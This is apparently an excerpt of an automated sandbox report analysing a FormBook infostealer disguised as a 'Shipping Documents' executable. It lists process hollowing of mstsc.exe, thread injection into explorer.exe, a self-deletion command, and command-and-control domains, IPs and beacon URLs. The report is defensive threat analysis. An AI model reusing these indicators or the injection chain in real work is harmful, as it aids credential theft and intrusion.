          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04804120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04804120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04804120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0486A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04814D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04814D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04814D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0481513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0481513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048B8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04823D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0480B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0480B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04863540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04807D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047E2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047E2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047E2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047E2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047E2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0480C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0480C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0487FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047F766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0481D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0481D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048646A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048B0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048B0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048B0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0481FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047E9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047E9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047E9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047E9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047F7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047F7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047F7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047F7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047F7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047F7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04828EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0489FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04812ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048136CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048B8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047EE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048116E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04812AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047EAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047EAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047E5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047E5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047E5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047E5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047F8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047EC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047EC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047EC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04818E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048A1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04803A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047F76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0481A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0481A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04824A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04824A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0489FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047FAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047FAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04874257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047E52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047E52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047E52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047E52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047E52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0489B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0489B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048B8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0480AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0480AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0480AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0480AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0480AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0482927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048A138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0489D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_0481B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04867794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04867794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04867794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04812397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047EDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047FFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047EF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04814BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04814BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_04814BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048B5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047EDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047FEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048653CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048653CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047E4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_047E4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 7_2_048103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\mstsc.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 1_2_10001548 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.maluss.com
          Source: C:\Windows\explorer.exeDomain query: www.magnumopuspro.com
          Source: C:\Windows\explorer.exeDomain query: www.exclusiveflooringcollection.com
          Source: C:\Windows\explorer.exeNetwork Connect: 23.227.38.74 80
          Source: C:\Windows\explorer.exeNetwork Connect: 198.185.159.144 80
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeSection loaded: unknown target: C:\Users\user\Desktop\202139769574 Shipping Documents.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeSection loaded: unknown target: C:\Windows\SysWOW64\mstsc.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeSection loaded: unknown target: C:\Windows\SysWOW64\mstsc.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeThread register set: target process: 3424
          Source: C:\Windows\SysWOW64\mstsc.exeThread register set: target process: 3424
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeSection unmapped: C:\Windows\SysWOW64\mstsc.exe base address: D20000
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeProcess created: C:\Users\user\Desktop\202139769574 Shipping Documents.exe 'C:\Users\user\Desktop\202139769574 Shipping Documents.exe'
          Source: C:\Windows\SysWOW64\mstsc.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\202139769574 Shipping Documents.exe'
          Source: explorer.exe, 00000004.00000000.654816016.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: ProgmanMD6
          Source: explorer.exe, 00000004.00000000.655818180.0000000001080000.00000002.00000001.sdmp, mstsc.exe, 00000007.00000002.909210651.0000000003070000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000004.00000000.672439987.0000000005E50000.00000004.00000001.sdmp, mstsc.exe, 00000007.00000002.909210651.0000000003070000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000000.655818180.0000000001080000.00000002.00000001.sdmp, mstsc.exe, 00000007.00000002.909210651.0000000003070000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000004.00000000.655818180.0000000001080000.00000002.00000001.sdmp, mstsc.exe, 00000007.00000002.909210651.0000000003070000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000004.00000000.681240089.000000000A716000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd5D
          Source: C:\Users\user\Desktop\202139769574 Shipping Documents.exeCode function: 1_2_00403461 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000002.00000002.699986623.0000000000620000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.657714825.0000000003070000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.698729438.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.700421859.00000000009D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.907951301.0000000000C80000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.907352431.0000000000470000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.650273193.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.907896289.0000000000A20000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.1.202139769574 Shipping Documents.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.202139769574 Shipping Documents.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.202139769574 Shipping Documents.exe.3070000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.202139769574 Shipping Documents.exe.3070000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.202139769574 Shipping Documents.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.202139769574 Shipping Documents.exe.400000.0.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000002.00000002.699986623.0000000000620000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.657714825.0000000003070000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.698729438.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.700421859.00000000009D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.907951301.0000000000C80000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.907352431.0000000000470000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000001.650273193.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.907896289.0000000000A20000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.1.202139769574 Shipping Documents.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.202139769574 Shipping Documents.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.202139769574 Shipping Documents.exe.3070000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.202139769574 Shipping Documents.exe.3070000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.1.202139769574 Shipping Documents.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.202139769574 Shipping Documents.exe.400000.0.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionAccess Token Manipulation1Rootkit1Credential API Hooking1Query Registry1Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsProcess Injection512Virtualization/Sandbox Evasion3LSASS MemorySecurity Software Discovery131Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Access Token Manipulation1Security Account ManagerVirtualization/Sandbox Evasion3SMB/Windows Admin SharesClipboard Data1Automated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection512NTDSProcess Discovery2Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information3Cached Domain CredentialsFile and Directory Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing11DCSyncSystem Information Discovery13Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 403523 Sample: 202139769574 Shipping Docum... Startdate: 04/05/2021 Architecture: WINDOWS Score: 100 36 Found malware configuration 2->36 38 Malicious sample detected (through community Yara rule) 2->38 40 Multi AV Scanner detection for submitted file 2->40 42 8 other signatures 2->42 10 202139769574 Shipping Documents.exe 19 2->10         started        process3 file4 28 C:\Users\user\AppData\...\22m80anrrsp.dll, PE32 10->28 dropped 52 Maps a DLL or memory area into another process 10->52 14 202139769574 Shipping Documents.exe 10->14         started        signatures5 process6 signatures7 54 Modifies the context of a thread in another process (thread injection) 14->54 56 Maps a DLL or memory area into another process 14->56 58 Sample uses process hollowing technique 14->58 60 Queues an APC in another process (thread injection) 14->60 17 explorer.exe 14->17 injected process8 dnsIp9 30 shops.myshopify.com 23.227.38.74, 49754, 80 CLOUDFLARENETUS Canada 17->30 32 www.maluss.com 17->32 34 4 other IPs or domains 17->34 44 System process connects to network (likely due to code injection or exploit) 17->44 21 mstsc.exe 17->21         started        signatures10 process11 signatures12 46 Modifies the context of a thread in another process (thread injection) 21->46 48 Maps a DLL or memory area into another process 21->48 50 Tries to detect virtualization through RDTSC time measurements 21->50 24 cmd.exe 1 21->24         started        process13 process14 26 conhost.exe 24->26         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          202139769574 Shipping Documents.exe33%VirustotalBrowse
          202139769574 Shipping Documents.exe32%ReversingLabsWin32.Trojan.Injexa
          202139769574 Shipping Documents.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          1.0.202139769574 Shipping Documents.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
          1.2.202139769574 Shipping Documents.exe.3070000.3.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          2.1.202139769574 Shipping Documents.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          2.2.202139769574 Shipping Documents.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          2.0.202139769574 Shipping Documents.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
          1.2.202139769574 Shipping Documents.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File

          Domains

          SourceDetectionScannerLabelLink
          shops.myshopify.com0%VirustotalBrowse
          www.maluss.com0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.exclusiveflooringcollection.com/nyr/?tVZl=EDKKYtZbbvwE4Q/e7xe/ld4gtfmRUWoVn+FtgOYbXYxqqFBCU6VSMnG1GKc/0KEvkVST&U4kp=NtxHhLZ8S6kT5jw0%Avira URL Cloudsafe
          http://www.maluss.com/nyr/?tVZl=MKniHD/KKNZ944A0QkseLq559MRPs5jQaAqVav9SZ3PAwf03LQBPNZ+ImXhjCplVxvzR&U4kp=NtxHhLZ8S6kT5jw0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          www.magnumopuspro.com/nyr/0%Avira URL Cloudsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          shops.myshopify.com
          		23.227.38.74
          		truetrueunknown
          ext-sq.squarespace.com
          		198.185.159.144
          		truefalse
            		high
            www.maluss.com
            		unknown
            		unknowntrueunknown
            www.magnumopuspro.com
            		unknown
            		unknowntrue
              		unknown
              www.exclusiveflooringcollection.com
              		unknown
              		unknowntrue
                		unknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://www.exclusiveflooringcollection.com/nyr/?tVZl=EDKKYtZbbvwE4Q/e7xe/ld4gtfmRUWoVn+FtgOYbXYxqqFBCU6VSMnG1GKc/0KEvkVST&U4kp=NtxHhLZ8S6kT5jwtrue
                • Avira URL Cloud: safe
                		unknown
                http://www.maluss.com/nyr/?tVZl=MKniHD/KKNZ944A0QkseLq559MRPs5jQaAqVav9SZ3PAwf03LQBPNZ+ImXhjCplVxvzR&U4kp=NtxHhLZ8S6kT5jwtrue
                • Avira URL Cloud: safe
                		unknown
                www.magnumopuspro.com/nyr/true
                • Avira URL Cloud: safe
                		low

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000004.00000000.684148917.000000000B976000.00000002.00000001.sdmpfalse
                  		high
